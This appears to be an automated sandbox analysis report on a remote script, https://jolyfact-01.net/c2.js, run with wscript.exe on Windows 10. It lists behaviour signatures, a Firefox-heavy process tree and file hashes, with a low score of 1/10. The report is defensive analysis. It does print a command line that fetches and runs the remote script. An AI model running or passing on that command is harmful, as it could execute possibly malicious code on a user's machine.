Overview

overview

1

Static

static

1

URLScan

urlscan

1

https://jolyfact-01....

windows10-2004-x64

1

Analysis

  • max time kernel
    113s
  • max time network
    110s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/06/2023, 06:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://jolyfact-01.net/c2.js

Score
1/10

Malware Config

Signatures

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe https://jolyfact-01.net/c2.js
    1⤵
      PID:4444
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3852
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          2⤵
          • Checks processor information in registry
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3984
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.0.1511109978\1238909156" -parentBuildID 20221007134813 -prefsHandle 1836 -prefMapHandle 1820 -prefsLen 20890 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1790522c-5bf9-43eb-b619-c196980942ba} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 1932 2301b7fbd58 gpu
            3⤵
              PID:1776
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.1.1884536100\1029783474" -parentBuildID 20221007134813 -prefsHandle 2304 -prefMapHandle 2300 -prefsLen 20926 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29db04f9-6b6e-423f-8aa6-fe661e48ab0a} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 2316 2300e86fb58 socket
              3⤵
                PID:2024
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.2.414009028\498453393" -childID 1 -isForBrowser -prefsHandle 3168 -prefMapHandle 3088 -prefsLen 21009 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5153401-9523-4c64-a23f-0b6b69db0527} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 3240 2301f4e0758 tab
                3⤵
                  PID:4404
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.3.656749555\1071318105" -childID 2 -isForBrowser -prefsHandle 2360 -prefMapHandle 1456 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c610376-3b07-4017-84c8-1757088f989f} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 3520 2300e867258 tab
                  3⤵
                    PID:372
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.4.164118177\1819612802" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4144 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b1b15be-2ac6-4bbd-b942-43dec3628453} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 4168 2300e861c58 tab
                    3⤵
                      PID:4924
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.5.1611192010\175257933" -childID 4 -isForBrowser -prefsHandle 5024 -prefMapHandle 5020 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d9ce037-618a-4618-a0e1-084571532bbe} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 5036 23021d9df58 tab
                      3⤵
                        PID:4024
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.7.898138717\509911983" -childID 6 -isForBrowser -prefsHandle 5324 -prefMapHandle 5328 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42e65721-c0f7-410c-9b31-e3cf54dde093} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 5316 23021d9d058 tab
                        3⤵
                          PID:632
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.6.396735895\228659927" -childID 5 -isForBrowser -prefsHandle 5128 -prefMapHandle 5132 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43a5b704-3089-45b0-b5b1-c5962b10c3fd} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 5056 23021d9ee58 tab
                          3⤵
                            PID:4028
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.8.626769518\1928135540" -childID 7 -isForBrowser -prefsHandle 1628 -prefMapHandle 4576 -prefsLen 26595 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {399ec4d0-a160-4773-bdd3-1288bc8dd225} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 2936 2300e82d258 tab
                            3⤵
                              PID:984

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\activity-stream.discovery_stream.json.tmp
                          Filesize

                          149KB

                          MD5

                          eaca3736813f246a0a1be48f54f0e1fa

                          SHA1

                          d6f06204139e5e5301d6dfd4b2c03dd6e3028956

                          SHA256

                          080dcb517de4bb6b87f531f75e2d2f7b6100c3d82cf81534f250b02ce29ddeee

                          SHA512

                          0464157358e1b40ea6930943d6e94bc7a12e25c9052447b168b80cfad367df1a5ef53045dbe7759f96d59baf73c59fbe0b9e0c47db46436c214e359a46065014

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs-1.js
                          Filesize

                          6KB

                          MD5

                          7b90a6c808f79b4172699a5e64d5c273

                          SHA1

                          d52d885f8c55136ea1dc016bc1bc9f5479d78f39

                          SHA256

                          2be6434d4613b6dbdcb7da421d43673ba6e30b5beafb7b90e9708806a670edf3

                          SHA512

                          cfb6a3dbe45155cce5b9dc56c171e417a1a4d114218d98b88964aa14846d37fafef454a3f52ca49500bfe23de393aca0056a0210f7e10f63ec8436fdf006cc21

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs-1.js
                          Filesize

                          6KB

                          MD5

                          f58454c824a65dbbb4f3847d936af9a4

                          SHA1

                          316a2321174349b4880f7078090d0e7fdc3cd69c

                          SHA256

                          f8e67abe9968a3331fa8dec685ebbc5c11f43e98ac76a7de4616fc3b5a74b36c

                          SHA512

                          a19d08a4760cb7aedea491a06bb586c2bebc64e8809fded0973b5ce520c5a0488b7171b36591c937edc765e4cec0883891f70c3f350fae2610cad3f4e03953d6

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs-1.js
                          Filesize

                          7KB

                          MD5

                          54d52079c26e498df7f7ce199f2ef19e

                          SHA1

                          30d670a9313bf8e3f1bb1941ece8d41782432244

                          SHA256

                          1f79fb2a298aea114419bca7fabf27a4f71935af9dc85945c33ad1905853d3a9

                          SHA512

                          e20dece1be74919bcf8326e102211980468921849e929f2230878faf15c542d9875b8f23adb32fb677ce04ce3fe95bfc674f5f3a8d2cab2d3bb66148cd2cb87d

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs-1.js
                          Filesize

                          6KB

                          MD5

                          f342afd8218aa43085c13ef9c12a0cce

                          SHA1

                          d9f833f32ddb91797fea8674dfa107cfed8e9b8b

                          SHA256

                          143b8bda0e84939b7490f9a3ee9ea25a172261b360c7128a3fb8196c02b9a361

                          SHA512

                          6cc02674348d1b9e7463bae895d3f01d35b79ec90e79d1f99845843e962dd212767b627f5b2b21602209193b9fd0a6ef264f8b14e2d70c93af46f599445beffc

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs.js
                          Filesize

                          6KB

                          MD5

                          1984b45f201f1fd79d2154406648433b

                          SHA1

                          42f082dc6d4d43333688690bf4dfa7c7f8b618ab

                          SHA256

                          000a408519010d12b94281710f9a987f822093a1efb5293bbb50ca2e4a6a9df9

                          SHA512

                          e73a00cc8994d4023168e93ff5f5b6e6b13ffeb740872b64f565787cbb57e49e64eb03e4de1d8068a6f303f0615749fb27cb47bdbc4cef3fef1290bd3a3a17cc

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\sessionstore-backups\recovery.jsonlz4
                          Filesize

                          1KB

                          MD5

                          5f7c898fb363dcd09b64d95510a5e4b4

                          SHA1

                          2b08f2fadc81b72cc2aaa1c8ec23bebd05a9f0fd

                          SHA256

                          9cb7417638072d502dddd86158054babe8f50d8d4edd5c44733a788343f2f932

                          SHA512

                          f911fb6a4a8368a80c29654acec488e9c5d2757496492bbf955b9310b620cd6aab4b481ff08ee7bb6b33dead3ce221a4c4f447f435aaed2da80359916ab46982

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\sessionstore-backups\recovery.jsonlz4
                          Filesize

                          1KB

                          MD5

                          1ec0996215e6e8b763ac74522b017ccd

                          SHA1

                          88173fe871b8fb2484e0f5db58a0b30737f0531c

                          SHA256

                          258f9b5a5f38f161a36322afcc77a10c03e36eb6ac2676cae29b224cbe5d4bf4

                          SHA512

                          b9b3457f57036b6f934f1c92d7f41fb3ec4b7a71b64dba979394b57ca5f1d6a24f9409c3ecae548000dcee225c58696d21c3a2486dbe51b73277b009d15a21fc

                          Download Submit